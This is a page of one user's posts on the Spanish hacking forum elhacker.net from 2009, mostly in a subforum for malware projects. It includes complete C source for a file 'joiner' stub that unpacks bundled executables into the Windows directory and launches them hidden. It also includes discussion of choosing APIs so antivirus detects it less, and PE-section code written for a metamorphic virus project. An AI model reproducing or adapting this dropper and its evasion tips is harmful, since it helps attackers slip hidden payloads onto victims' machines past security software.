elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


  Mostrar Mensajes
Páginas: 1 ... 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 [59] 60 61 62 63 64 65 66 67 68 69 70 71 72
581  Seguridad Informática / Nivel Web / Re: SQL Injection Tool en: 15 Mayo 2009, 17:55 pm
Jaja, hombre gracias, eso me motiva a continuar el proyecto  ;D. La nueva versión la estaba haciendo en java pero como ahora ya tengo algo de soltura con C igual lo hago en C. También estoy desarrollando al mismo tiempo la versión web en xul y javascript, tenéis que abrirlo con firefox (solo está la gui, antes haré la versión en C).

Saludos
582  Programación / Programación Visual Basic / Re: Ejecutar Exe con Funcion determinada en: 12 Mayo 2009, 20:49 pm
Para saber con qué parametros se lanza una aplicación programa algo que printee los parámetros con los que se lanza y lo sustituyes por el exe al que le quieres averiguar los parámetos, lo hice una vez para saber con que parámetros se llamaba al compilador de vb, igual te sirve  :P.

Saludos
583  Seguridad Informática / Nivel Web / Re: SQL Injection Tool en: 12 Mayo 2009, 20:20 pm
Arrelado, a ver si configuro bien apache un dia de éstos  :P. A todo ésto, me olvidé de ésta tool, jaja, a ver si para el verano la sigo  :xD.

Saludos
584  Seguridad Informática / Abril negro / Re: Little Joiner 1.0 (Open Source) en: 11 Mayo 2009, 17:27 pm
Bueno Karcrack, éste source es para ti  ;D.

Código
  1. #pragma optimize("gsy", on)
  2. #include <windows.h>
  3.  
  4. typedef DWORD (WINAPI *_RtlDecompressBuffer)(IN ULONG CompressionFormat,OUT PVOID DestinationBuffer,IN ULONG DestinationBufferLength,
  5. 	IN PVOID SourceBuffer,IN ULONG SourceBufferLength,OUT PULONG pDestinationSize );
  6.  
  7. typedef VOID (WINAPI *_CopyMemory)(PVOID Destination,CONST VOID *Source,SIZE_T Length);
  8.  
  9. DWORD dwBytes;
  10.  
  11. VOID SaveFileToDisk(LPSTR nFileName,LPSTR lpFileMaped,DWORD FileSize)
  12. {
  13. 	HANDLE hSFTD=CreateFile(nFileName,GENERIC_READ+GENERIC_WRITE,0,0,CREATE_ALWAYS,0,0);
  14. 	WriteFile(hSFTD,lpFileMaped,FileSize,&dwBytes,0);
  15. 	CloseHandle(hSFTD);
  16. }
  17.  
  18. LPSTR DecompressBuffer(LPSTR lpBuffer,DWORD szBuffer,LPDWORD dwSizeOut )
  19. {
  20.    _RtlDecompressBuffer miRtlDecompressBuffer;
  21.  
  22.    LPSTR szRet=(LPSTR)GlobalAlloc(GPTR,16*szBuffer);
  23.  
  24.    miRtlDecompressBuffer=(_RtlDecompressBuffer)GetProcAddress((HINSTANCE)LoadLibraryA("NTDLL.DLL"),"RtlDecompressBuffer");
  25.  
  26.    miRtlDecompressBuffer(COMPRESSION_FORMAT_LZNT1,szRet,16*szBuffer,lpBuffer,szBuffer,dwSizeOut);
  27.  
  28.    return szRet;
  29. }
  30.  
  31. void main()
  32. {
  33. 	_CopyMemory miCopyMemory=NULL;
  34. 	miCopyMemory=(_CopyMemory)GetProcAddress(GetModuleHandle("KERNEL32.DLL"),"RtlMoveMemory");
  35.  
  36. 	DWORD szSubFile;
  37. 	LPSTR ext=(LPSTR)GlobalAlloc(GPTR,3);
  38. 	DWORD Seek=0;
  39. 	LPSTR lpFile=NULL;
  40.  
  41. 	LPSTR AppName=(LPSTR)GlobalAlloc(GPTR,MAX_PATH);
  42. 	GetModuleFileName(0,AppName,MAX_PATH);
  43.  
  44. 	HANDLE hFile=CreateFile(AppName,GENERIC_READ,0,0,OPEN_EXISTING,0,0);
  45. 	DWORD szFile=GetFileSize(hFile,0);
  46. 	LPSTR FileBuffer=(LPSTR)GlobalAlloc(GPTR,szFile);
  47. 	ReadFile(hFile,FileBuffer,szFile,&dwBytes,0);
  48.  
  49. 	DWORD StubSize=0x640;
  50.  
  51. 	LPSTR WinPath=(LPSTR)GlobalAlloc(GPTR,MAX_PATH);
  52. 	GetWindowsDirectory(WinPath,MAX_PATH);
  53.  
  54. 	DWORD NumArchivos;
  55. 	miCopyMemory(&NumArchivos,&FileBuffer[StubSize],4);
  56.  
  57. 	Seek=4;
  58. 	for(DWORD i=0;i<NumArchivos;i++)
  59. 	{
  60. 		//Obtenemos el peso del archivo
  61. 		miCopyMemory(&szSubFile,&FileBuffer[StubSize+Seek],4);
  62.  
  63. 		//Obtenemos la extensión
  64. 		miCopyMemory(&ext[0],&FileBuffer[StubSize+Seek+4],3);
  65.  
  66. 		//Leemos el archivo
  67. 		lpFile=(LPSTR)GlobalAlloc(GPTR,szSubFile);
  68. 		miCopyMemory(&lpFile[0],&FileBuffer[StubSize+Seek+7],szSubFile);
  69.  
  70. 		//Lo descomprimimos
  71. 		DWORD szDecompressedFile;
  72. 		LPSTR lpDecompressedFile=DecompressBuffer(lpFile,szSubFile,&szDecompressedFile);
  73.  
  74. 		//Generamos la ruta
  75. 		LPSTR Path=(LPSTR)GlobalAlloc(GPTR,MAX_PATH);
  76. 		lstrcat(Path,WinPath);
  77. 		lstrcat(Path,"\\"); //" //Ta mal geshi ¬¬
  78. 		LPSTR fName=NULL;
  79. 		for(DWORD z=0;z<i+1;z++)
  80. 		{
  81. 			lstrcat(fName,"A");
  82. 		}
  83. 		lstrcat(Path,fName);
  84. 		lstrcat(Path,".");
  85. 		lstrcat(Path,ext);
  86.  
  87. 		//Lo guardamos en WinPath
  88. 		SaveFileToDisk(Path,lpDecompressedFile,szDecompressedFile);
  89.  
  90. 		LPSTR Archivo=(LPSTR)GlobalAlloc(GPTR,MAX_PATH);
  91. 		lstrcat(Archivo,"cmd /d /c \"");
  92. 		lstrcat(Archivo,WinPath);
  93. 		lstrcat(Archivo,"\\"); //" //Ta mal geshi ¬¬
  94. 		lstrcat(Archivo,fName);
  95. 		lstrcat(Archivo,".");
  96. 		lstrcat(Archivo,ext);
  97. 		lstrcat(Archivo,"\"");
  98.  
  99. 		WinExec(Archivo,SW_HIDE);
  100.  
  101. 		Seek=Seek+11+szSubFile;
  102.  
  103. 	}
  104. 	CloseHandle(hFile);
  105. }
  106.  

No importa la SHELL32.DLL y pesa 0.25kb menos o así  :xD. Después del 17 seguiré con el joiner, haré que inyecte los exes en memoria, una sección para los datos y algo más.

Saludos
585  Seguridad Informática / Abril negro / Re: BHC (Batch Hide Compiler 2.2) by WHK [Proyecto para abril Negro] en: 10 Mayo 2009, 18:34 pm
Cita de: WHK en  8 Mayo 2009, 20:45 pm
Si, yo ya tenía la idea inicial de declarar el buffer del script como 2048 pero es bastante limitado si quieres hacer un script largo como por ejemplo el crackme B4 del warzone o muy grande si quieres poner un "dir > o".

Lo que dices está lo mas normal de hacer, por ahi me dieron un par de ideas que tendré que traducir con "google 1337"  :xD
https://foro.elhacker.net/ingenieria_inversa/agregar_mas_caracteres_de_los_declarados_en_un_binario-t254313.0.html;msg1230610#msg1230610
eso de mapearlo o de modificar el puntero antiguo no le entendí ya que es primera ves que hago algo de este tipo (he aprendido muchisimo haciendo los stubs), lo que si pude entender es que en una parte se guarde el EOF, entonces al momento de inyectar el cuerpo del script en el binario solamente tendría que unir la parte 1 mas el script mas el EOF pero de alguna forma me dice como debo hacerlo para no corromper el binario pero ahi ya no supe como.

La idea está buena y tan buena como la de usar recursos como me dijo krackwar al inicio de la primera version  :P solo que el me hablaba de asm y no npi. Tendría que compilar el stub con un solo recurso de tipo texto y ahi inyectar todo modificando ese recurso solamente.. ahora no se que tan facil sea hacerlo manualmente ya que desde el editor debo modificar estos valores hexadecimalmente ya que no voy a meterle el reshack dentro del ide, no se puede.

Bueno, ahi ya me dieron varias ideas que iré testeando en el camino, gracias.

Éste código tal vez te sirva, no está en vb pero se puede traducir, en la parte del joiner está como añadir el EOF a la sección y como mapear archivos en memoria, añadirles tamaño y eso.

Saludos
586  Seguridad Informática / Abril negro / Re: Little Joiner 1.0 (Open Source) en: 10 Mayo 2009, 16:59 pm
Cita de: E0N en 10 Mayo 2009, 14:50 pm
Muy bueno, lo vas a presentar a el concurso??
No, aún me queda un fin de semana para el metamorph, no estará completo pero presentaré lo que tenga con el código.

Saludos
Cita de: Karcrack en 10 Mayo 2009, 14:19 pm
Para la próxima podrías añadir lo de eligir si ejecutar o no ;D

Me ha funcionado perfectamente ;)

4kb + 264kb -> 263kb ;)

He estado mirando... Estas APIs para que las gastas?
  • GetCommandLine
  • wsprintf

Lo digo porque podrías quitarlas... te ahorrarías importar USER32... ademas, también puedes eliminar SHELL32, si usas para abrir los ficheros WinExec + 'CMD /C /D' ;D (MUCHO MENOS DETECTADA)

Te ahorrarías unos bytes :xD :xD

Ah! Que directorio temporal gasta? WinDir? :-\ Mejor %TMP% :P

GetCommandLine no recuerdo usarla  :huh:. wsprintf la uso para concatenar la ruta de extracción con el nombre y la extensión del archivo. Lo de cambiar shellexecute pues si, seguramente pese menos y algunos antivirus se larguen. Avira y el otro según me dijeron lo detecta por tener sólo una sección, si compilas un messagebox con fasm de forma que te genere una sóla sección también saltan, si se agrega una sección para contener los archivos que se unirán deberían de irse, de todas formas no creo que lo haga (por lo menos antes del 17 xd) si alguien quiere continuar el proyecto pos está a su disposición.

Saludos
587  Seguridad Informática / Abril negro / Re: Little Joiner 1.0 (Open Source) en: 10 Mayo 2009, 14:22 pm
No, lo empecé ayer y lo tenía ayer casi todo, me faltaba el stub con icono que quería sacarle el eof pero al final lo dejé igual. Lo de las apis de compresión es impresionante el ratio que tienen  :o.

Saludos
588  Seguridad Informática / Abril negro / Little Joiner 1.0 (Open Source) en: 10 Mayo 2009, 13:05 pm
Little Joiner

Bueno, pare descansar un poco de programar el Virus Metamorph me puse a programar éste joiner.

¿Qué es?

Es un Joiner programado en C capaz de unir infinitos archivos, lo de siempre  :xD.

Captura


Características
-Tamaño del stu reducido, 1.7kb.

-Comprime los archivos a juntar. Ésto quiere decir que si juntamos un archivo de 20kb con uno de 10kb más el stub de 1.7kb el tamaño del ejecutable final rondará los 10kb (Depende del tipo de archivo) Gracias a Karcrack por hablarme de éstas apis que no conocía  ;)

-Dos stubs, uno que soporta icono y otro que no

-El stub sin icono realinea el pe para dejar el EOF dentro de la sección.

-Permite cambiar el icono


Cosas que se pueden mejorar

-Se puede añadir cifrado, no lo hice porque el comprimir ya se ofusca bastante, pero puede ser algo a añadir.

-El stub con icono no permite dejar los archivos dentro de la sección sinó que se quedan en el EOF. Ésto se debe a que no sé con antelación cuanto va a ocupar el archivo ya que dependerá del icono que se le añada, se podría corregir añadiendo una sección para albergar los archivos a juntar.

-Seguro tiene algunos fallos debido a que apenas lo testeé y ya estoy cansado de joiner  :xD.

Descargar Aplicación

Descargar Source

Saludos

PD: La función para cambiar el icono no es mía, pertenece a Tughack.
589  Programación / Ingeniería Inversa / Re: VirtualSize mayor que RawSize?? en: 10 Mayo 2009, 02:37 am
Pos yo siempre había entendido que el VirtualSize tiene que ser mayor o igual que el RawSize. Si sobra VirtualSize, el sobrante se rellena de 0's al cargarse en memoria . Lo que no creo que se pueda es menor, entonces no cogería el código en memoria   :P.

Saludos

PD: Es más, los redondeos que hacen los compiladores siempre redondean más largo el VirtualSize que el RawSize.
590  Seguridad Informática / Abril negro / Re: Proyecto Metamorph en: 9 Mayo 2009, 00:55 am
Dejando el source así con ese exe en concreto funciona:

Código
  1. 	HANDLE hFile=CreateFile(nFileName,GENERIC_READ+GENERIC_WRITE,FILE_SHARE_WRITE+FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
  2. 	if(hFile == INVALID_HANDLE_VALUE)
  3. 	{
  4. 		return NULL;
  5. 	}
  6.  
  7. 	DWORD szFile=GetFileSize(hFile,0);
  8. 	if(szFile == INVALID_FILE_SIZE)
  9. 	{
  10. 		return NULL;
  11. 	}
  12.  
  13. 	szFile=szFile+0x200;
  14.  
  15. 	HANDLE hCFM=CreateFileMapping(hFile,0,PAGE_READWRITE,0,szFile,0);
  16. 	if(hCFM==NULL)
  17. 	{
  18. 		return NULL;
  19. 	}
  20.  
  21. 	CloseHandle(hFile);
  22.  
  23. 	LPSTR hMVOF=(LPSTR)malloc(szFile);
  24. 	hMVOF=(LPSTR)MapViewOfFile(hCFM,FILE_MAP_ALL_ACCESS,0,0,0);
  25. 	if(hMVOF==NULL)
  26. 	{
  27. 		return NULL;
  28. 	}
  29.  
  30. 	CloseHandle(hCFM);
  31.  
  32. 	PIMAGE_DOS_HEADER IDH;
  33. 	PIMAGE_NT_HEADERS INTH;
  34. 	PIMAGE_SECTION_HEADER ISH;
  35.  
  36. 	IDH=(PIMAGE_DOS_HEADER)&hMVOF[0];
  37. 	INTH=(PIMAGE_NT_HEADERS)&hMVOF[IDH->e_lfanew];
  38.  
  39. 	DWORD ExecutableSection=GetExecutableSection(hMVOF);
  40.  
  41. 	ISH=(PIMAGE_SECTION_HEADER)&hMVOF[IDH->e_lfanew+sizeof(IMAGE_NT_HEADERS)+sizeof(IMAGE_SECTION_HEADER)*ExecutableSection];
  42.  
  43. 	LPSTR Temp=(LPSTR)malloc(szFile-(ISH->PointerToRawData+ISH->SizeOfRawData+0x200));
  44. 	CopyMemory(&Temp[0],&hMVOF[ISH->PointerToRawData+ISH->SizeOfRawData],szFile-(ISH->PointerToRawData+ISH->SizeOfRawData+0x200));
  45.  
  46. 	CopyMemory(&hMVOF[ISH->PointerToRawData+ISH->SizeOfRawData+0x200],&Temp[0],szFile-(ISH->PointerToRawData+ISH->SizeOfRawData+0x200));
  47.  
  48. 	BYTE zero=0x00;
  49.  
  50. 	for(DWORD i=0;i<0x200;i++)
  51. 	{
  52. 		CopyMemory(&hMVOF[ISH->PointerToRawData+ISH->SizeOfRawData+i],&zero,1);
  53. 	}
  54.  
  55. 	ISH->SizeOfRawData=ISH->SizeOfRawData+0x200;
  56. 	ISH->Misc.VirtualSize=ISH->Misc.VirtualSize+0x200;
  57. 	//INTH->OptionalHeader.SizeOfImage=INTH->OptionalHeader.SizeOfImage+0x200;
  58.  
  59. 	//PIMAGE_DATA_DIRECTORY IDD;
  60. 	//PIMAGE_OPTIONAL_HEADER IOH;
  61.  
  62. 	//IOH=&INTH->OptionalHeader ;
  63. 	//IDD=IOH->DataDirectory;
  64. 	//IDD++; 
  65. 	//IDD->VirtualAddress=IDD->VirtualAddress+0x200;
  66.  
  67. 	for(i=0;i<=INTH->FileHeader.NumberOfSections;i++)
  68. 	{
  69. 		ExecutableSection=GetExecutableSection(hMVOF);
  70. 		ISH=(PIMAGE_SECTION_HEADER)&hMVOF[IDH->e_lfanew+sizeof(IMAGE_NT_HEADERS)+sizeof(IMAGE_SECTION_HEADER)*(ExecutableSection+1+i)];
  71. 		ISH->PointerToRawData=ISH->PointerToRawData+0x200;
  72. 		//ISH->VirtualAddress=ISH->VirtualAddress+0x200;
  73. 	}
  74.  
  75. 	return hMVOF;	
  76.  
  77. }
  78.  

Pero no entiendo un carajo, porqué así funciona? se supone que así está mal  :P. Osea el SizeOfImage original es 5000 entonces al aumentar 200 pos lo aumente 200, pero entonces peta (Creo que ya sé por que es  :xD). El virtual addres de la sección que viene después igual  :o. Y el puntero a la tabla de importaciones también, para que funcione hay que dejarlo como estaba, pero si lo moví 200 posiciones, que pasa? Lo único que se me ocurre es que funcione pero esté mal, que esos 0x200 que agregué no se carguen en memoria entonces las direcciones coinciden  :huh:.

Saludos
Páginas: 1 ... 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 [59] 60 61 62 63 64 65 66 67 68 69 70 71 72
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines